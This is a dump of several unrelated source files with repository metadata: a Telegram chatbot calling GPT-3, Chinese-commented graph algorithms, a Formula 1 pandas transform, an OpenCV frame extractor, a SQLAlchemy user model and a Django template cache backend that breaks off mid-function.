# -*- coding: utf-8 -*- # !pip install python-telegram-bot from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters) from config import TOKEN_TELEGRAM as config from gpt3 import getAnswer as gpt3 from files import writeSession as session def start(update, context): context.bot.send_message(update.message.chat_id, "Bienvenido") def mensaje_nocomando(update, context): cid = update.message.chat_id # obtengo el id_usuario question_user = update.message.text # obtengo el mensaje del usuario old_log = session.getLog(cid) # miro si hay un log previo cargado en cache, sino creo el cache para este usuario answer, new_log = gpt3.getAnswer(question_user, old_log) # le pido a la IA una respuesta al comentario del usuario session.writeSession(cid, new_log) # guardo el cache para este usuario update.message.reply_text(answer) # respondo al usuario if __name__=="__main__": print("Chatbot iniciado.") updater = Updater(config.TOKEN_TELEGRAM, use_context=True) dp=updater.dispatcher dp.add_handler(CommandHandler("start", start)) # respuesta al comando /start dp.add_handler(MessageHandler(Filters.text, mensaje_nocomando)) # respuesta a los comentarios del usuario updater.start_polling() updater.idle()
es
0.969596
# -*- coding: utf-8 -*- # !pip install python-telegram-bot # obtengo el id_usuario # obtengo el mensaje del usuario # miro si hay un log previo cargado en cache, sino creo el cache para este usuario # le pido a la IA una respuesta al comentario del usuario # guardo el cache para este usuario # respondo al usuario # respuesta al comando /start # respuesta a los comentarios del usuario
2.608485
3
graph_test.py
QMH-TMY/Arithmetic
0
6623601
<reponame>QMH-TMY/Arithmetic # -*- coding:UTF8 -*- #!/usr/bin/python #Shieber on 2018/8/8 #图及其结构 from graph import Graph from queue import Queue,PriorityQueue #********************问题1****************************************# def buildCharGraph(wordFile): '''字梯圖''' wdLis = {} graph = Graph() wfile = open(wordFile,'r') for line in wfile: word = line[:-1] #去掉换行符 for i in range(len(word)): sig = word[:i] + '_' + word[i+1:] if sig in wdLis: wdLis[sig].append(word) else: wdLis[sig] = [word] for sig in wdLis.keys(): for word1 in wdLis[sig]: for word2 in wdLis[sig]: if word1 != word2: graph.addEdge(word1,word2) return graph #G,d = buildCharGraph("wordfile.txt") #print(G.getVertices()) #print(G.getEdge()) #print(d.keys()) #*******解决方案********# def BFS(G,start): '''字梯图解决方案:广度优先搜索,时间复杂度:O(V+E)''' start = G.getVertex(start) start.setDistance(0) start.setPred(None) vertQueue = Queue() #加入队列 vertQueue.enqueue(start) while vertQueue.size() > 0: currVert = vertQueue.dequeue() for nbr in currVert.getConnections(): if 'white' == nbr.getColor(): nbr.setColor('grey') nbr.setPred(currVert) nbr.setDistance(currVert.getDistance()+1) vertQueue.enqueue(nbr) currVert.setColor('black') def traverse(G,mark): '''打印出任意字回到原始字的路径''' node = G.getVertex(mark) dist = 0 while node.getPred(): print(node.getId(),dist) dist += 1 node = node.getPred() print(node.getId(),dist) #********************问题2****************************************# def kinghtGraph(size): '''骑士之旅图''' ktGraph = Graph() for row in xrange(size): for col in xrange(size): currNode = pos2node(row,col,size) #将坐标转换为点数 legalPos = getPos(row,col,size) #得到可去的坐标 for pos in legalPos: avalNode = pos2node(pos[0],pos[1],size) ktGraph.addEdge(currNode,avalNode) return ktGraph def getPos(row,col,size): '''得到可去的坐标''' newMoves = [] stepVector = [ (-2,-1),(-1,-2),(2,-1),(1,-2), (-2, 1),(-1, 2),(2, 1),(1, 2) #对于马来说,可以移动的步伐向量 ] for step in stepVector: newRow = row + step[0] newCol = col + step[1] if legal(newRow,newCol,size): newMoves.append((newRow,newCol)) return newMoves def legal(row,col,size): '''判断是否超界''' return True if 0<= row < size and 0<= col < size else False #if 0<= row < size and 0<= col < size: # return True #else: # return False def pos2node(row,col,size): '''将坐标转换为点数''' return (row * size) + col #print "point number:%d"%g.numVertice #print "Edge number:%d"%g.edgeNumber #print "space rate :%.2f%%"%((g.edgeNumber + 0.0)*100/(i**4)) #*******解决方案1********# def DFS1(depth,path,vertex,limit): '''深度优先树,时间复杂度:O(k^N),非常高''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = list(vertex.getConnections()) done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS1(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done #*******解决方案2********# def orderByAvail(vertex): '''启发式算法,局部搜索''' resList = [] for vet in vertex.getConnections(): if 'white' == vet.getColor(): depth = 0 for w in vet.getConnections(): if 'white' == w.getColor(): depth += 1 resList.append((depth,vet)) resList.sort(key=lambda item:item[0]) return [minivet[1] for minivet in resList] def DFS2(depth,path,vertex,limit): '''深度优先树,结合启发式算法,时间复杂度:O(2^N),''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = orderByAvail(vertex) #从短的到长的,反向来 done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS2(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done ''' G = kinghtGraph(8) path = [] vertex = G.getVertex(0) DFS2(0,path,vertex,63) print len(path) ''' ######################################################### class DFSGraph(Graph): '''通用深度优化森林,时间复杂度:O(V+E)''' def __init__(self): super().__init__() self.time = 0 def dfs(self): '''清空点的颜色,从新开始迭代查找''' for aVertex in self: aVertex.setColor('white') aVertex.setPred(-1) for aVertex in self: if 'white' == aVertex.getColor(): self.dfsvisit(aVertex) def dfsvisit(self,startVertex): '''迭代查找''' startVertex.setColor('gray') self.time += 1 startVertex.setDiscovery(self.time) for nextVertex in startVertex.getConnections(): if 'white' == nextVertex.getColor(): nextVertex.setPred(startVertex) self.dfsvisit(nextVertex) startVertex.setColor('black') self.time += 1 startVertex.setFinish(self.time) ######################################################### #/*******************************/# def SCC(DFSgraph1): '''强连通分量算法''' DFSgraph1.dfs() #计算图的完成时间 fini1 = sortFini(DFSgraph1) #func1 DFSgraph2 = transGraph(DFSgraph1) #转置图 func2 DFSgraph2.dfs() fini2 = sortFini(DFSgraph2,False) position = [i for i in range(len(fini1)) if fini1[i] == fini2[i]] graphlis = splitList(Olist,position) #func3 return graphlis def sortFini(graph,rever=True): '''联通量算法辅助1:将完成时间列表排序''' fini = [(item.fini,item.id) for item in graph.vertexList.values()] fini.sort(key=lambda item:item[0],reverse=rever) #从大到小排列完成时间 return fini def transGraph(graph): '''连通量算法辅助2:得到一幅图的转置图''' newgraph = DFSgraph() for vert in graph.vertexList.keys(): for nbr in vert.getConnections(): newgraph.addEdge(nbr,vert,vert.getWeight(nbr)) return newgraph def splitList(Olist,pos): '''连通量算法辅助3:拆分列表''' Glist = [] length = len(Olist)-1 keyval = pos[-1] for i in xrange(len(posList)): if keyval != length: if keyval == pos[i]: Glist.append(Olist[pos[i]:]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) else: if keyval == pos[i]: Glist.append(Olist[keyval]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) return Glist #总的列表,存储所有小的连通量 #/*******************************/# def dijkstra(G,start): '''最短路径算法,时间复杂度:O((V+E)logV) 需要整个图,实际运用不现实 距离矢量路由算法只需要一部分图顶点''' start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #加入队列 PriQueue.buildHeap([(v.getDistance(),v) for v in G]) while not PriQueue.isEmpty(): currVert = PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) #/*******************************/# def prim(G,start): '''贪婪算法系列算法,时间复杂度:O((V+E)logV + V)''' for v in G: v.setDistance(sys.maxsize) v.setPred(None) start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #创建优先队列 PriQueue.buildHeap([(v.getDistance(),v) for v in G]) while not PriQueue.isEmpty(): currVert = PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if nbr in PriQueue and newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) def getMinPath(G,endpos): '''打印出任意顶点回到起点的最短路径''' node = G.getVertex(endpos) dist = node.getDistance() while None != node.getPred(): dist = node.getDistance() print(node.getId(),dist) node = node.getPred() print(node.getId(),dist) #/*******************************/#
# -*- coding:UTF8 -*- #!/usr/bin/python #Shieber on 2018/8/8 #图及其结构 from graph import Graph from queue import Queue,PriorityQueue #********************问题1****************************************# def buildCharGraph(wordFile): '''字梯圖''' wdLis = {} graph = Graph() wfile = open(wordFile,'r') for line in wfile: word = line[:-1] #去掉换行符 for i in range(len(word)): sig = word[:i] + '_' + word[i+1:] if sig in wdLis: wdLis[sig].append(word) else: wdLis[sig] = [word] for sig in wdLis.keys(): for word1 in wdLis[sig]: for word2 in wdLis[sig]: if word1 != word2: graph.addEdge(word1,word2) return graph #G,d = buildCharGraph("wordfile.txt") #print(G.getVertices()) #print(G.getEdge()) #print(d.keys()) #*******解决方案********# def BFS(G,start): '''字梯图解决方案:广度优先搜索,时间复杂度:O(V+E)''' start = G.getVertex(start) start.setDistance(0) start.setPred(None) vertQueue = Queue() #加入队列 vertQueue.enqueue(start) while vertQueue.size() > 0: currVert = vertQueue.dequeue() for nbr in currVert.getConnections(): if 'white' == nbr.getColor(): nbr.setColor('grey') nbr.setPred(currVert) nbr.setDistance(currVert.getDistance()+1) vertQueue.enqueue(nbr) currVert.setColor('black') def traverse(G,mark): '''打印出任意字回到原始字的路径''' node = G.getVertex(mark) dist = 0 while node.getPred(): print(node.getId(),dist) dist += 1 node = node.getPred() print(node.getId(),dist) #********************问题2****************************************# def kinghtGraph(size): '''骑士之旅图''' ktGraph = Graph() for row in xrange(size): for col in xrange(size): currNode = pos2node(row,col,size) #将坐标转换为点数 legalPos = getPos(row,col,size) #得到可去的坐标 for pos in legalPos: avalNode = pos2node(pos[0],pos[1],size) ktGraph.addEdge(currNode,avalNode) return ktGraph def getPos(row,col,size): '''得到可去的坐标''' newMoves = [] stepVector = [ (-2,-1),(-1,-2),(2,-1),(1,-2), (-2, 1),(-1, 2),(2, 1),(1, 2) #对于马来说,可以移动的步伐向量 ] for step in stepVector: newRow = row + step[0] newCol = col + step[1] if legal(newRow,newCol,size): newMoves.append((newRow,newCol)) return newMoves def legal(row,col,size): '''判断是否超界''' return True if 0<= row < size and 0<= col < size else False #if 0<= row < size and 0<= col < size: # return True #else: # return False def pos2node(row,col,size): '''将坐标转换为点数''' return (row * size) + col #print "point number:%d"%g.numVertice #print "Edge number:%d"%g.edgeNumber #print "space rate :%.2f%%"%((g.edgeNumber + 0.0)*100/(i**4)) #*******解决方案1********# def DFS1(depth,path,vertex,limit): '''深度优先树,时间复杂度:O(k^N),非常高''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = list(vertex.getConnections()) done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS1(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done #*******解决方案2********# def orderByAvail(vertex): '''启发式算法,局部搜索''' resList = [] for vet in vertex.getConnections(): if 'white' == vet.getColor(): depth = 0 for w in vet.getConnections(): if 'white' == w.getColor(): depth += 1 resList.append((depth,vet)) resList.sort(key=lambda item:item[0]) return [minivet[1] for minivet in resList] def DFS2(depth,path,vertex,limit): '''深度优先树,结合启发式算法,时间复杂度:O(2^N),''' vertex.setColor('grey') path.append(vertex) if depth < limit: nbrList = orderByAvail(vertex) #从短的到长的,反向来 done = False index = 0 while index < len(nbrList) and not done: if 'white' == nbrList[index].getColor(): done = DFS2(depth+1,path,nbrList[index],limit) index += 1 if not done: path.pop() vertex.setColor('white') else: done = True return done ''' G = kinghtGraph(8) path = [] vertex = G.getVertex(0) DFS2(0,path,vertex,63) print len(path) ''' ######################################################### class DFSGraph(Graph): '''通用深度优化森林,时间复杂度:O(V+E)''' def __init__(self): super().__init__() self.time = 0 def dfs(self): '''清空点的颜色,从新开始迭代查找''' for aVertex in self: aVertex.setColor('white') aVertex.setPred(-1) for aVertex in self: if 'white' == aVertex.getColor(): self.dfsvisit(aVertex) def dfsvisit(self,startVertex): '''迭代查找''' startVertex.setColor('gray') self.time += 1 startVertex.setDiscovery(self.time) for nextVertex in startVertex.getConnections(): if 'white' == nextVertex.getColor(): nextVertex.setPred(startVertex) self.dfsvisit(nextVertex) startVertex.setColor('black') self.time += 1 startVertex.setFinish(self.time) ######################################################### #/*******************************/# def SCC(DFSgraph1): '''强连通分量算法''' DFSgraph1.dfs() #计算图的完成时间 fini1 = sortFini(DFSgraph1) #func1 DFSgraph2 = transGraph(DFSgraph1) #转置图 func2 DFSgraph2.dfs() fini2 = sortFini(DFSgraph2,False) position = [i for i in range(len(fini1)) if fini1[i] == fini2[i]] graphlis = splitList(Olist,position) #func3 return graphlis def sortFini(graph,rever=True): '''联通量算法辅助1:将完成时间列表排序''' fini = [(item.fini,item.id) for item in graph.vertexList.values()] fini.sort(key=lambda item:item[0],reverse=rever) #从大到小排列完成时间 return fini def transGraph(graph): '''连通量算法辅助2:得到一幅图的转置图''' newgraph = DFSgraph() for vert in graph.vertexList.keys(): for nbr in vert.getConnections(): newgraph.addEdge(nbr,vert,vert.getWeight(nbr)) return newgraph def splitList(Olist,pos): '''连通量算法辅助3:拆分列表''' Glist = [] length = len(Olist)-1 keyval = pos[-1] for i in xrange(len(posList)): if keyval != length: if keyval == pos[i]: Glist.append(Olist[pos[i]:]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) else: if keyval == pos[i]: Glist.append(Olist[keyval]) elif pos[i]+1 == pos[i+1]: Glist.append(Olist[pos[i]]) else: Glist.append(Olist[pos[i]]) Glist.append(Olist[pos[i]+1:pos[i+1]]) return Glist #总的列表,存储所有小的连通量 #/*******************************/# def dijkstra(G,start): '''最短路径算法,时间复杂度:O((V+E)logV) 需要整个图,实际运用不现实 距离矢量路由算法只需要一部分图顶点''' start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #加入队列 PriQueue.buildHeap([(v.getDistance(),v) for v in G]) while not PriQueue.isEmpty(): currVert = PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) #/*******************************/# def prim(G,start): '''贪婪算法系列算法,时间复杂度:O((V+E)logV + V)''' for v in G: v.setDistance(sys.maxsize) v.setPred(None) start = G.getVertex(start) start.setDistance(0) PriQueue = PriorityQueue() #创建优先队列 PriQueue.buildHeap([(v.getDistance(),v) for v in G]) while not PriQueue.isEmpty(): currVert = PriQueue.delMin() for nbr in currVert.getConnections(): newDist = currVert.getDistance() + currVert.getWeight(nbr) if nbr in PriQueue and newDist < nbr.getDistance(): nbr.setPred(currVert) nbr.setDistance(newDist) PriQueue.decreaseKey(nbr,newDist) def getMinPath(G,endpos): '''打印出任意顶点回到起点的最短路径''' node = G.getVertex(endpos) dist = node.getDistance() while None != node.getPred(): dist = node.getDistance() print(node.getId(),dist) node = node.getPred() print(node.getId(),dist) #/*******************************/#
zh
0.621372
# -*- coding:UTF8 -*- #!/usr/bin/python #Shieber on 2018/8/8 #图及其结构 #********************问题1****************************************# 字梯圖 #去掉换行符 #G,d = buildCharGraph("wordfile.txt") #print(G.getVertices()) #print(G.getEdge()) #print(d.keys()) #*******解决方案********# 字梯图解决方案:广度优先搜索,时间复杂度:O(V+E) #加入队列 打印出任意字回到原始字的路径 #********************问题2****************************************# 骑士之旅图 #将坐标转换为点数 #得到可去的坐标 得到可去的坐标 #对于马来说,可以移动的步伐向量 判断是否超界 #if 0<= row < size and 0<= col < size: # return True #else: # return False 将坐标转换为点数 #print "point number:%d"%g.numVertice #print "Edge number:%d"%g.edgeNumber #print "space rate :%.2f%%"%((g.edgeNumber + 0.0)*100/(i**4)) #*******解决方案1********# 深度优先树,时间复杂度:O(k^N),非常高 #*******解决方案2********# 启发式算法,局部搜索 深度优先树,结合启发式算法,时间复杂度:O(2^N), #从短的到长的,反向来 G = kinghtGraph(8) path = [] vertex = G.getVertex(0) DFS2(0,path,vertex,63) print len(path) ######################################################### 通用深度优化森林,时间复杂度:O(V+E) 清空点的颜色,从新开始迭代查找 迭代查找 ######################################################### #/*******************************/# 强连通分量算法 #计算图的完成时间 #func1 #转置图 func2 #func3 联通量算法辅助1:将完成时间列表排序 #从大到小排列完成时间 连通量算法辅助2:得到一幅图的转置图 连通量算法辅助3:拆分列表 #总的列表,存储所有小的连通量 #/*******************************/# 最短路径算法,时间复杂度:O((V+E)logV) 需要整个图,实际运用不现实 距离矢量路由算法只需要一部分图顶点 #加入队列 #/*******************************/# 贪婪算法系列算法,时间复杂度:O((V+E)logV + V) #创建优先队列 打印出任意顶点回到起点的最短路径 #/*******************************/#
3.424286
3
DataPipeline/transform.py
kelleyjean/condenast-de-project
0
6623602
import pandas as pd import csv import glob from datetime import datetime pickle_path = 'pickle_files' pickle_files = glob.glob(pickle_path + '/*.pkl') pitstops_df = pd.read_pickle(pickle_path + './pit_stops.csv.pkl') races_df = pd.read_pickle(pickle_path + './races.csv.pkl') driver_df = pd.read_pickle(pickle_path + './drivers.csv.pkl') results_df = pd.read_pickle(pickle_path + './results.csv.pkl') def clean_data(): pitstops_df['duration'] = pd.to_numeric(pitstops_df.duration, errors='coerce') return pitstops_df def transformation_1(): clean_data() #merges pitstops and races on raceId to bring in race name merged_df_1 = pitstops_df.merge(races_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') new_df_cols = merged_df_2.columns.tolist() if 'driverId' and 'raceId' and 'forename' and 'surname' and 'name' in new_df_cols: print('driverId, raceId, forename, surname, and name exist in new dataframe.') else: print('One or more columns are missing.') if 'duration' in new_df_cols and merged_df_2['duration'].dtype == 'float64': print('duration exists in dataframe and datatype is float.') else: print('duration does not exist in dataframe') analysis_df = merged_df_2[['raceId', 'driverId', 'name', 'forename', 'surname', 'duration']] # group data to get average duration and write to csv file analysis_df = analysis_df.groupby(['raceId', 'driverId', 'name', 'forename', 'surname'], as_index=False)['duration'].mean() analysis_df.to_csv( 'transformation_1.csv', index=False, encoding='utf-8' ) def transformation_2(): driver_df['code'] = driver_df['surname'].str.upper() driver_df['code'] = driver_df['code'].str.slice(start=0, stop=3) driver_df.to_csv( 'transformation_2.csv', index=False, encoding='utf-8' ) def transformation_3(season_year): season_year = season_year merged_df_1 = races_df.merge(results_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') selected_year_df = merged_df_2.loc[merged_df_2['year'] == season_year] #pseudo logic: #a year (int64) is passed through the function which selects the season to run the analysis #select min(season_year_race_date) and max(season_year_race_date) #create two columns, the driver's DOB subtracted from the min(season_year_date) and the driver's DOB subtracted from max(season_year_date) # for min(season_year_dat) column, select the driver(s) with youngest/oldest age, and do the same for max(season_year_date) # return results to csv #exception handling should be implemented in the event that the season_year entered is not within the range of years in the file transformation_1() transformation_2()
import pandas as pd import csv import glob from datetime import datetime pickle_path = 'pickle_files' pickle_files = glob.glob(pickle_path + '/*.pkl') pitstops_df = pd.read_pickle(pickle_path + './pit_stops.csv.pkl') races_df = pd.read_pickle(pickle_path + './races.csv.pkl') driver_df = pd.read_pickle(pickle_path + './drivers.csv.pkl') results_df = pd.read_pickle(pickle_path + './results.csv.pkl') def clean_data(): pitstops_df['duration'] = pd.to_numeric(pitstops_df.duration, errors='coerce') return pitstops_df def transformation_1(): clean_data() #merges pitstops and races on raceId to bring in race name merged_df_1 = pitstops_df.merge(races_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') new_df_cols = merged_df_2.columns.tolist() if 'driverId' and 'raceId' and 'forename' and 'surname' and 'name' in new_df_cols: print('driverId, raceId, forename, surname, and name exist in new dataframe.') else: print('One or more columns are missing.') if 'duration' in new_df_cols and merged_df_2['duration'].dtype == 'float64': print('duration exists in dataframe and datatype is float.') else: print('duration does not exist in dataframe') analysis_df = merged_df_2[['raceId', 'driverId', 'name', 'forename', 'surname', 'duration']] # group data to get average duration and write to csv file analysis_df = analysis_df.groupby(['raceId', 'driverId', 'name', 'forename', 'surname'], as_index=False)['duration'].mean() analysis_df.to_csv( 'transformation_1.csv', index=False, encoding='utf-8' ) def transformation_2(): driver_df['code'] = driver_df['surname'].str.upper() driver_df['code'] = driver_df['code'].str.slice(start=0, stop=3) driver_df.to_csv( 'transformation_2.csv', index=False, encoding='utf-8' ) def transformation_3(season_year): season_year = season_year merged_df_1 = races_df.merge(results_df, how='inner', on = 'raceId') merged_df_2 = merged_df_1.merge(driver_df, how='inner', on = 'driverId') selected_year_df = merged_df_2.loc[merged_df_2['year'] == season_year] #pseudo logic: #a year (int64) is passed through the function which selects the season to run the analysis #select min(season_year_race_date) and max(season_year_race_date) #create two columns, the driver's DOB subtracted from the min(season_year_date) and the driver's DOB subtracted from max(season_year_date) # for min(season_year_dat) column, select the driver(s) with youngest/oldest age, and do the same for max(season_year_date) # return results to csv #exception handling should be implemented in the event that the season_year entered is not within the range of years in the file transformation_1() transformation_2()
en
0.863017
#merges pitstops and races on raceId to bring in race name # group data to get average duration and write to csv file #pseudo logic: #a year (int64) is passed through the function which selects the season to run the analysis #select min(season_year_race_date) and max(season_year_race_date) #create two columns, the driver's DOB subtracted from the min(season_year_date) and the driver's DOB subtracted from max(season_year_date) # for min(season_year_dat) column, select the driver(s) with youngest/oldest age, and do the same for max(season_year_date) # return results to csv #exception handling should be implemented in the event that the season_year entered is not within the range of years in the file
3.271378
3
cutvideo2frames.py
Talegqz/phased_based-motion__disentanglement
1
6623603
<filename>cutvideo2frames.py import numpy as np import cv2 from PIL import Image import os def deal_video(): cap = cv2.VideoCapture('data/cinesmall.avi') a = 0 frams = [] while(cap.isOpened()): ret, frame = cap.read() a+=1 # pic.show() if ret == True: frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) pic = Image.fromarray(frame,"RGB") # pic = pic.resize((64,64)) pic.save('data/cine/%d.png'%a) # cv2.imshow('frame',frame) else: break if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destroyAllWindows() if __name__ == '__main__': deal_video()
<filename>cutvideo2frames.py import numpy as np import cv2 from PIL import Image import os def deal_video(): cap = cv2.VideoCapture('data/cinesmall.avi') a = 0 frams = [] while(cap.isOpened()): ret, frame = cap.read() a+=1 # pic.show() if ret == True: frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) pic = Image.fromarray(frame,"RGB") # pic = pic.resize((64,64)) pic.save('data/cine/%d.png'%a) # cv2.imshow('frame',frame) else: break if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destroyAllWindows() if __name__ == '__main__': deal_video()
en
0.192178
# pic.show() # pic = pic.resize((64,64)) # cv2.imshow('frame',frame)
2.941422
3
charybdis/user/models.py
gitter-badger/charybdis
0
6623604
<filename>charybdis/user/models.py from uuid import uuid4 from passlib.hash import pbkdf2_sha512 from slugify import slugify from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy.orm import backref from ..app import db from ..domain.models import Domain from ..permission.models import Permission from ..project.models import Project class UserRole(db.Model): slug = db.Column(db.String, nullable=False) @db.validates("slug") def validate_slug(self, key, value) -> str: assert slugify(value) == value, "Incorrect slug for user role!" return value class User(db.Model): first_name = db.Column(db.String, nullable=False) last_name = db.Column(db.String, nullable=False) patronymic = db.Column(db.String, nullable=True) birthday = db.Column(db.Date, nullable=False) role_id = db.Column(db.Integer, db.ForeignKey(UserRole.id), nullable=False) role = db.relationship(UserRole) is_active = db.Column(db.Boolean, default=True, server_default="true") username = db.Column(db.String, unique=True) _password_hash = db.Column("password_hash", db.String) uuid = db.Column(UUID(as_uuid=True), default=uuid4, nullable=False) domain_id = db.Column(db.Integer, db.ForeignKey(Domain.id), nullable=False) domain = db.relationship(Domain) @db.validates("username") def validate_username(self, key: str, value: str) -> str: assert value == slugify(value), "Incorrect username!" return value @property def rolename(self): return self.role.slug @classmethod def lookup(cls, username): return cls.query.filter_by(username=username).one_or_none() @hybrid_property def password_hash(self) -> str: return self._password_hash @password_hash.setter def password_hash(self, value: str) -> None: self._password_hash = <PASSWORD>.<PASSWORD>(value) def check_password(self, candidate: str) -> bool: return pbkdf2_sha512.verify(candidate, self._password_hash) class UserPermissionLinker(db.Model): permission_id = db.Column(db.Integer, db.ForeignKey(Permission.id), nullable=False) user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False) permission = db.relationship(Permission, uselist=False) user = db.relationship(User) project_id = db.Column(db.Integer, db.ForeignKey(Project.id), nullable=False) project = db.relationship(Project, backref=backref("users"), uselist=False) __table_args__ = (db.UniqueConstraint("permission_id", "user_id", "project_id"),)
<filename>charybdis/user/models.py from uuid import uuid4 from passlib.hash import pbkdf2_sha512 from slugify import slugify from sqlalchemy.dialects.postgresql import UUID from sqlalchemy.ext.hybrid import hybrid_property from sqlalchemy.orm import backref from ..app import db from ..domain.models import Domain from ..permission.models import Permission from ..project.models import Project class UserRole(db.Model): slug = db.Column(db.String, nullable=False) @db.validates("slug") def validate_slug(self, key, value) -> str: assert slugify(value) == value, "Incorrect slug for user role!" return value class User(db.Model): first_name = db.Column(db.String, nullable=False) last_name = db.Column(db.String, nullable=False) patronymic = db.Column(db.String, nullable=True) birthday = db.Column(db.Date, nullable=False) role_id = db.Column(db.Integer, db.ForeignKey(UserRole.id), nullable=False) role = db.relationship(UserRole) is_active = db.Column(db.Boolean, default=True, server_default="true") username = db.Column(db.String, unique=True) _password_hash = db.Column("password_hash", db.String) uuid = db.Column(UUID(as_uuid=True), default=uuid4, nullable=False) domain_id = db.Column(db.Integer, db.ForeignKey(Domain.id), nullable=False) domain = db.relationship(Domain) @db.validates("username") def validate_username(self, key: str, value: str) -> str: assert value == slugify(value), "Incorrect username!" return value @property def rolename(self): return self.role.slug @classmethod def lookup(cls, username): return cls.query.filter_by(username=username).one_or_none() @hybrid_property def password_hash(self) -> str: return self._password_hash @password_hash.setter def password_hash(self, value: str) -> None: self._password_hash = <PASSWORD>.<PASSWORD>(value) def check_password(self, candidate: str) -> bool: return pbkdf2_sha512.verify(candidate, self._password_hash) class UserPermissionLinker(db.Model): permission_id = db.Column(db.Integer, db.ForeignKey(Permission.id), nullable=False) user_id = db.Column(db.Integer, db.ForeignKey(User.id), nullable=False) permission = db.relationship(Permission, uselist=False) user = db.relationship(User) project_id = db.Column(db.Integer, db.ForeignKey(Project.id), nullable=False) project = db.relationship(Project, backref=backref("users"), uselist=False) __table_args__ = (db.UniqueConstraint("permission_id", "user_id", "project_id"),)
none
1
2.47512
2
apps/external_apps/dbtemplates/cache.py
indro/t2c
3
6623605
import os from django.conf import settings from django.core.cache import cache from django.template import TemplateDoesNotExist from django.core.exceptions import ImproperlyConfigured from django.utils.encoding import smart_unicode, force_unicode class BaseCacheBackend(object): """ Base class for custom cache backend of dbtemplates to be used while subclassing. Set DBTEMPLATES_CACHE_BACKEND setting to the Python path to that subclass. """ def _site(self): from django.contrib.sites.models import Site return Site.objects.get_current() site = property(_site) def load(self, name): """ Loads a template from the cache with the given name. """ raise NotImplemented def save(self, name, content): """ Saves the given template content with the given name in the cache. """ raise NotImplemented def remove(self, name): """ Removes the template with the given name from the cache. """ raise NotImplemented class DjangoCacheBackend(BaseCacheBackend): """ A cache backend that uses Django's cache mechanism. """ def _cache_key(self, name): return 'dbtemplates::%s' % name def load(self, name): cache_key = self._cache_key(name) return cache.get(cache_key) def save(self, name, content): cache_key = self._cache_key(name) cache.set(cache_key, content) def remove(self, name): cache_key = self._cache_key(name) cache.delete(cache_key) class FileSystemBackend(BaseCacheBackend): """ A cache backend that uses simple files to hold the template cache. """ def __init__(self): try: self.cache_dir = getattr(settings, 'DBTEMPLATES_CACHE_DIR', None) self.cache_dir = os.path.normpath(self.cache_dir) if not os.path.isdir(self.cache_dir): pass except: raise ImproperlyConfigured('You\'re using the dbtemplates\' file system cache backend without having set the DBTEMPLATES_CACHE_DIR setting to a valid value. Make sure the directory exists and is writeable for the user your Django instance is running with.') super(FileSystemBackend, self).__init__() def _filepath(self, name): return os.path.join(self.cache_dir, name) def load(self, name): try: filepath = self._filepath(name) return open(filepath).read().decode('utf-8') except: return None def save(self, name, content, retry=False): try: filepath = self._filepath(name) dirname = os.path.dirname(filepath) if not os.path.exists(dirname): os.makedirs(dirname) cache_file = open(filepath, 'w') cache_file.write(force_unicode(content).encode('utf-8')) cache_file.close() except Exception: raise def remove(self, name): try: filepath = self._filepath(name) os.remove(filepath) except: pass
import os from django.conf import settings from django.core.cache import cache from django.template import TemplateDoesNotExist from django.core.exceptions import ImproperlyConfigured from django.utils.encoding import smart_unicode, force_unicode class BaseCacheBackend(object): """ Base class for custom cache backend of dbtemplates to be used while subclassing. Set DBTEMPLATES_CACHE_BACKEND setting to the Python path to that subclass. """ def _site(self): from django.contrib.sites.models import Site return Site.objects.get_current() site = property(_site) def load(self, name): """ Loads a template from the cache with the given name. """ raise NotImplemented def save(self, name, content): """ Saves the given template content with the given name in the cache. """ raise NotImplemented def remove(self, name): """ Removes the template with the given name from the cache. """ raise NotImplemented class DjangoCacheBackend(BaseCacheBackend): """ A cache backend that uses Django's cache mechanism. """ def _cache_key(self, name): return 'dbtemplates::%s' % name def load(self, name): cache_key = self._cache_key(name) return cache.get(cache_key) def save(self, name, content): cache_key = self._cache_key(name) cache.set(cache_key, content) def remove(self, name): cache_key = 